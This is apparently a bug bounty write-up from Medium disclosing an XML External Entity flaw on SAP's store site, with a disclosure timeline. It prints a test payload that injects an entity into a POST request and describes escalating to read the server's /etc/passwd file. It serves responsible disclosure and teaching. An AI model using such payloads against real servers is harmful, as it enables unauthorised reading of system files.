An interesting XXE in SAP.

Zain Sabahat
Nov 19, 2018 · 2 min read

Hello Folks!

Let me introduce myself to the community. I’m Zain Sabahat, a Security Researcher and Bug Bounty Hunter from Pakistan. Since I have learned a lot of stuff from reading write-ups I have decided to play my role in giving back to the community. I will be disclosing some of my best findings in a series of write-ups.

Today I will be disclosing about an XXE — XML External Entity vulnerability I discovered in SAP’s subdomain https://store.sap.com

During my recon, I came across a store subdomain. When I opened https://store.sap.com it redirected me to the https://store.sap.com/sap/cpa/ui/resources/store/html/StoreFront.html During the loading of that page, a set of GET and POST requests were passed. One of the POST request to /sap/cpa/api/getSolutionsendpoint caught my attention.

I manipulated the POST data to :

<!DOCTYPE foo [<!ENTITY xxe SYSTEM “Zain Here”> ]><SolutionListRequest><Facets><FacetType><Code/><Value/></FacetType></Facets><ListingType>2</ListingType><CountryCode>US</CountryCode><RetrieveAllDetailsIndicator>1</RetrieveAllDetailsIndicator><RetrieveFacetsIndicator/><RowCount>24&xxe;</RowCount><RowIndex>1</RowIndex><SearchText/><SolutionGroup/><SolutionTypeIndicator/><CategoryID/><RecommenderPageIndicator/><ResellerID/><ShoppingCartID/><CompanyID/><EndCustomerAddressID/><UserRoleCode/></SolutionListRequest>

in order to check if it was vulnerable to XXE or not.

Verified the presence of XXE

When I saw my name printed out in response I got very happy and decided to exploit it further. I crafted the POST request in order to print out the contents of “/etc/passwd/” file.

Successfully printed out /etc/passwd file

Timeline:

Jun 26, 2017 — Reported to SAP.

Jul 17, 2017 — Triaged.

Feb 13, 2018 — Fixed.

April 10, 2018 — Added to Hall Of Fame.

It took them almost a year to fix because that bug was in their internal component which was hard to replace.

Thanks for reading! Stay tuned for more write-ups!

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store